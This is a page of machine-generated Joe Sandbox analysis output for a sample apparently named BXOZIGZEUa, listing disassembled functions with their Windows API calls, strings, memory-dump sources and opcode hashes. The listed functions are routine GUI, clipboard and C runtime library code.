Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: CaptureCursorReleaseState
String ID: D2$2$2
API String ID: 3832350104-1793331178
Opcode ID: 329bb48711c7b049d8f1bc11b153539ed6e91b85fe67de7c8c1e7882c534779a
Instruction ID: a804c0f1aa3f08d2ae8568e03a420a8b3ce52f44be76f0b814ff4d35ef2c40df
Opcode Fuzzy Hash: 329bb48711c7b049d8f1bc11b153539ed6e91b85fe67de7c8c1e7882c534779a
Instruction Fuzzy Hash: 095191716002099FDB65AF68C889BBEB7E5BF58310F14446EE656872A2EF709C80CF51

Function 002A2F7E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 002A2F85

Part of subcall function 002A2EF6: OleGetClipboard.OLE32(?), ref: 002A2F0E

ReleaseStgMedium.OLE32(?), ref: 002A2FFA
ReleaseStgMedium.OLE32(?), ref: 002A303F
CoTaskMemFree.OLE32(?), ref: 002A30E7
ReleaseStgMedium.OLE32(?), ref: 002A305F

Part of subcall function 001C8E6A: _malloc.LIBCMT ref: 001C8E88

Strings

', xrefs: 002A2FC1

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: MediumRelease$ClipboardFreeH_prolog3_catchTask_malloc
String ID: '
API String ID: 3930503942-1997036262
Opcode ID: 346bb77daaa3d5ab523e48c93a0c64646902edaf0894d865bcf3e2279a80c624
Instruction ID: bc94b14328946fab628dcb02b5da46a4aa9a1186813b58a80de58ba3b8c8791d
Opcode Fuzzy Hash: 346bb77daaa3d5ab523e48c93a0c64646902edaf0894d865bcf3e2279a80c624
Instruction Fuzzy Hash: C6517D71920209EFCF10DFA4C989AED7BB4AF19300F20842EF545EB281DF759B548B61

Function 00212412 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 134COMMON

Download Yara Rule

APIs

MonitorFromPoint.USER32(?,?,00000002), ref: 002124F4
GetMonitorInfoW.USER32(00000000), ref: 002124FB
CopyRect.USER32(?,?), ref: 0021250D
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0021251D
IntersectRect.USER32(?,?,?), ref: 00212550

Strings

(, xrefs: 002124ED

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: InfoMonitorRect$CopyFromIntersectParametersPointSystem
String ID: (
API String ID: 2931574886-3887548279
Opcode ID: 14706fc015713232eca46ac5347b5e8a1ddd3fb8f797b0cb2657302f213c6459
Instruction ID: a39a4d903da9580451268a5e4f18cfccdfc03ad25ae5788f895eb3b5d822614d
Opcode Fuzzy Hash: 14706fc015713232eca46ac5347b5e8a1ddd3fb8f797b0cb2657302f213c6459
Instruction Fuzzy Hash: 8151D5B1D10209DFCB24CFA9D988AEEFBF9BF58300B50452AE515A7250DB70AA54CF60

Function 001E87DD Relevance: 10.6, APIs: 7, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 00239B37: __EH_prolog3_catch.LIBCMT ref: 00239B3E

UpdateWindow.USER32(?), ref: 001E8871
EqualRect.USER32(?,?), ref: 001E88A7
InflateRect.USER32(?,00000002,00000002), ref: 001E88BF
InvalidateRect.USER32(?,?,00000001), ref: 001E88CE
InflateRect.USER32(?,00000002,00000002), ref: 001E88E3
InvalidateRect.USER32(?,?,00000001), ref: 001E88F5
UpdateWindow.USER32(?), ref: 001E88FE

Part of subcall function 001E83AB: InvalidateRect.USER32(?,?,00000001,?), ref: 001E8420
Part of subcall function 001E83AB: InflateRect.USER32(?,?,?), ref: 001E8466
Part of subcall function 001E83AB: RedrawWindow.USER32(?,?,00000000,00000401,?,?), ref: 001E8479

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$InflateInvalidateWindow$Update$EqualH_prolog3_catchRedraw
String ID:
API String ID: 1041772997-0
Opcode ID: 80c4f655925124e8b355263025401ef5606ce7f4844f4d8b3115cc56d2e5b7a7
Instruction ID: aae654bf5b8d4b8770df18cc982f292379e46d4c9bd23470da130a07f8aee76d
Opcode Fuzzy Hash: 80c4f655925124e8b355263025401ef5606ce7f4844f4d8b3115cc56d2e5b7a7
Instruction Fuzzy Hash: 20415871A006459FCB11DF69C8C8BAE77B9BB48314F140279ED4AEF192DB309945CB61

Function 001D8A11 Relevance: 10.6, APIs: 7, Instructions: 117windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 001D8A44
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001D8A68
UpdateWindow.USER32(?), ref: 001D8A83
SendMessageW.USER32(?,00000121,00000000,?), ref: 001D8AA4
SendMessageW.USER32(?,0000036A,00000000,00000002), ref: 001D8ABC
UpdateWindow.USER32(?), ref: 001D8AFF
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001D8B30

Part of subcall function 001DCBFE: GetWindowLongW.USER32(?,000000F0), ref: 001DCC09

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 110060394703e8baf7f55c2e77a8d7f5ca2bb043b9d3282e881e7b15478d558c
Instruction ID: dd63ce1da991d582dbc876e3666d928e17cc2f60fe4ee652e6b9bed2d7420e79
Opcode Fuzzy Hash: 110060394703e8baf7f55c2e77a8d7f5ca2bb043b9d3282e881e7b15478d558c
Instruction Fuzzy Hash: AE419D70900645EBCF219FAACC89EAFBFB4FF91744F24452FE485A62A1DB718940DB50

Function 0023DB36 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0023DB3D

Part of subcall function 001CDB6E: __EH_prolog3.LIBCMT ref: 001CDB75
Part of subcall function 001CDB6E: LoadCursorW.USER32(00000000,00007F00), ref: 001CDBA1
Part of subcall function 001CDB6E: GetClassInfoW.USER32(?,00000000,?), ref: 001CDBE5

CopyRect.USER32(?,?), ref: 0023DBF1

Part of subcall function 001D015C: ClientToScreen.USER32(?,?), ref: 001D016D
Part of subcall function 001D015C: ClientToScreen.USER32(?,?), ref: 001D017A

IsRectEmpty.USER32(?), ref: 0023DC0A
IsRectEmpty.USER32(?), ref: 0023DC22
IsRectEmpty.USER32(?), ref: 0023DC37

Strings

Afx:ControlBar, xrefs: 0023DB6C

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Empty$ClientScreen$ClassCopyCursorH_prolog3H_prolog3_InfoLoad
String ID: Afx:ControlBar
API String ID: 2202805320-4244778371
Opcode ID: a31c4eaa1a0530bfc9e066351423a60d2adb09298810817192bb34f4f9113b51
Instruction ID: 20824843d2c4400e8655818f391cb9fe34c327f7addb74bda33673ffc5d98ae3
Opcode Fuzzy Hash: a31c4eaa1a0530bfc9e066351423a60d2adb09298810817192bb34f4f9113b51
Instruction Fuzzy Hash: 734139719102189BCF15EFA4D884EEEB7BABF19300F050169FD06BB251DB71E915CB60

Function 0028A647 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0028A64E

Part of subcall function 0024C236: __EH_prolog3.LIBCMT ref: 0024C23D

Part of subcall function 002A236A: SetRectEmpty.USER32(?), ref: 002A239A

SetRectEmpty.USER32(?), ref: 0028A796
SetRectEmpty.USER32(?), ref: 0028A7A5
SetRectEmpty.USER32(?), ref: 0028A7AE

Strings

False, xrefs: 0028A805
True, xrefs: 0028A7B9

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: EmptyRect$H_prolog3
String ID: False$True
API String ID: 3752103406-1895882422
Opcode ID: 85cc892d4a15c10000f5eb0d073cc64c7265632ce25cfa93ff648ab3a024158d
Instruction ID: 0fdf8bc9d8257fac0a18c70861338758c6026c10d42e647b13f007c0bf2f5ca1
Opcode Fuzzy Hash: 85cc892d4a15c10000f5eb0d073cc64c7265632ce25cfa93ff648ab3a024158d
Instruction Fuzzy Hash: AD5190B0812B448FD366EF7AC5857DAFAE8BF64304F50495ED0AE962A1CBB02644CF15

Function 001E0833 Relevance: 10.6, APIs: 7, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 001E07A0: _malloc.LIBCMT ref: 001E07B3

_free.LIBCMT ref: 001E085C
_memset.LIBCMT ref: 001E0875
_memset.LIBCMT ref: 001E08AF
_memcpy_s.LIBCMT ref: 001E08C9
CreateDIBSection.GDI32(00000000,00000000,00000000,00000008,00000000,00000000), ref: 001E08E2
_free.LIBCMT ref: 001E08F4
_free.LIBCMT ref: 001E0927

Part of subcall function 002BE216: HeapFree.KERNEL32(00000000,00000000,?,002C5DB2,00000000,?,002C4298,?,00000001,?,?,002C6FC6,00000018,00328280,0000000C,002C7056), ref: 002BE22C
Part of subcall function 002BE216: GetLastError.KERNEL32(00000000,?,002C5DB2,00000000,?,002C4298,?,00000001,?,?,002C6FC6,00000018,00328280,0000000C,002C7056,?), ref: 002BE23E

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: _free$_memset$CreateErrorFreeHeapLastSection_malloc_memcpy_s
String ID:
API String ID: 2204576675-0
Opcode ID: 7da75320c47f427284e92ab887418c89e4f76136cdbf8d8d0d90938aae75e9ee
Instruction ID: 4c33e699e6ba7a830bf5fbb3976f3bff25a1f5d5a51b4581ab64aaf1c228137d
Opcode Fuzzy Hash: 7da75320c47f427284e92ab887418c89e4f76136cdbf8d8d0d90938aae75e9ee
Instruction Fuzzy Hash: 3331D472910A55ABEB25DF25CC01FAF73A8EF19364F114429E985A7242D7B0ED808BE0

Function 00213060 Relevance: 10.6, APIs: 7, Instructions: 110windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00213093

Part of subcall function 00220419: RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00220490

IsWindowVisible.USER32(?), ref: 002130BD
IsWindowVisible.USER32(?), ref: 00213101
RedrawWindow.USER32(?,00000000,00000000,00000585), ref: 00213123
RedrawWindow.USER32(?,00000000,00000000,00000501), ref: 00213135
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00213157
RedrawWindow.USER32(?,?,00000000,00000541), ref: 00213188

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Redraw$Visible
String ID:
API String ID: 1637130220-0
Opcode ID: fd5c62b425bb66655fd6afa5f83abec84328804297848f2cbf326fcc6e6f22e8
Instruction ID: c72321f99222b424dbdbfac2e589e47746fcd2859952282fcd6a59e629d91d52
Opcode Fuzzy Hash: fd5c62b425bb66655fd6afa5f83abec84328804297848f2cbf326fcc6e6f22e8
Instruction Fuzzy Hash: E9416A7161024AEFDB20DF65CDC0AAABBFABF14345F10447DE14A96261D7309E90CF61

Function 001D90A1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001D913A
SendMessageW.USER32(00000000,00000433,00000000,?), ref: 001D9163
GetWindowLongW.USER32(?,000000FC), ref: 001D9175
GetWindowLongW.USER32(?,000000FC), ref: 001D9186
SetWindowLongW.USER32(?,000000FC,?), ref: 001D91A2

Strings

,, xrefs: 001D9159

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: LongWindow$MessageSend_memset
String ID: ,
API String ID: 2997958587-3772416878
Opcode ID: ecc11d224d36ac5310b73809c07063d1d1dbacd3d70ef78078364d92acd4be51
Instruction ID: 1a142a0c2a8ade2d72706fb1a2222d2dd8ada5294a6efeb81929de12848aba3d
Opcode Fuzzy Hash: ecc11d224d36ac5310b73809c07063d1d1dbacd3d70ef78078364d92acd4be51
Instruction Fuzzy Hash: 38417E75600305AFDB20EF78D889A6EB7E9BF58320F14066EF58697791DB30E900CB90

Function 0023DF0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109windowstringCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0023DF15
SendMessageW.USER32(?,00000421,00000001,?), ref: 0023DFA9
SendMessageW.USER32(?,00000421,00000001,?), ref: 0023DFC1
_calloc.LIBCMT ref: 0023DFDD
lstrcpyW.KERNEL32(00000000,00000010,?,00000004,001EFEF2,?,?,00000002,?,?,00000000), ref: 0023DFF0

Strings

X*1, xrefs: 0023DF6F

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageSend$H_prolog3_calloclstrcpy
String ID: X*1
API String ID: 3273239350-2740677128
Opcode ID: 95bb25cd047ad8cdd611e6e9af07656975200697e9bf6036e6667530a4a23fba
Instruction ID: cbaa2637a5981ee904a0defb671e5d65d0f1092eb22393cb647b5a63826563c4
Opcode Fuzzy Hash: 95bb25cd047ad8cdd611e6e9af07656975200697e9bf6036e6667530a4a23fba
Instruction Fuzzy Hash: 3B41ADB26202469FCF14EF68DCC5AAE77A5FF14320F14452AF5269B2D1CB70D864CB51

Function 001EBD57 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 001EBDA6
GetParent.USER32(?), ref: 001EBDC7
GetParent.USER32(?), ref: 001EBDFA
UpdateWindow.USER32(?), ref: 001EBE5C
SendMessageW.USER32(?,00000362,0000E001,00000000), ref: 001EBE87

Strings

83/, xrefs: 001EBDD8

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Parent$FocusMessageSendUpdateWindow
String ID: 83/
API String ID: 2438739141-2323854675
Opcode ID: f757b5842efa072dccffe00ca1ef83aa8aea555e6de562a39d6928079c995b2d
Instruction ID: d342d148923d610423efb232c8d40c133fa4db1e50e53fab51cd829d34352e59
Opcode Fuzzy Hash: f757b5842efa072dccffe00ca1ef83aa8aea555e6de562a39d6928079c995b2d
Instruction Fuzzy Hash: E8319271604B409FDB25AF36CC85A6FB6E5EF94760F254A2DF56A97290DF30D9008B40

Function 001C7310 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001C733D
std::_Lockit::_Lockit.LIBCPMT ref: 001C7360
std::bad_exception::bad_exception.LIBCMT ref: 001C73E4
__CxxThrowException@8.LIBCMT ref: 001C73F2
std::_Lockit::_Lockit.LIBCPMT ref: 001C7405

Strings

h*1, xrefs: 001C73DC

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Throwstd::bad_exception::bad_exception
String ID: h*1
API String ID: 2513498551-1237549831
Opcode ID: a29212c026fd6a38009f470e460a2788cfb53eb9e7a6a5eaa2a1d5339fb56672
Instruction ID: 7fb4d245d426292b895f9e21280ff5b23c978bbd9940c73e0aafd8cd9d744127
Opcode Fuzzy Hash: a29212c026fd6a38009f470e460a2788cfb53eb9e7a6a5eaa2a1d5339fb56672
Instruction Fuzzy Hash: C931AF71914205DBCB25DF64D882FAEB7B8FB24720F50465EE811A72D1DBB0AD00CF90

Function 001C66B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001C66DC
std::_Lockit::_Lockit.LIBCPMT ref: 001C66FF
std::bad_exception::bad_exception.LIBCMT ref: 001C6780
__CxxThrowException@8.LIBCMT ref: 001C678E
std::_Lockit::_Lockit.LIBCPMT ref: 001C67A1

Strings

bad cast, xrefs: 001C6778

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Throwstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 2513498551-3145022300
Opcode ID: f7af5056bc5257b31ec5ba19ab083d50843c050c5617b2915f78c63481d4d733
Instruction ID: edf5fd9bf5cd196b90b467342c7089c52676239b0aca965bf79cf468930daf7b
Opcode Fuzzy Hash: f7af5056bc5257b31ec5ba19ab083d50843c050c5617b2915f78c63481d4d733
Instruction Fuzzy Hash: 2431BF35811311CBCB15DF64D982FAEB3B8FB24728F510A5EE426A7291DB70AD04CF91

Function 001C6960 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001C698C
std::_Lockit::_Lockit.LIBCPMT ref: 001C69AF
std::bad_exception::bad_exception.LIBCMT ref: 001C6A30
__CxxThrowException@8.LIBCMT ref: 001C6A3E
std::_Lockit::_Lockit.LIBCPMT ref: 001C6A51

Strings

bad cast, xrefs: 001C6A28

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

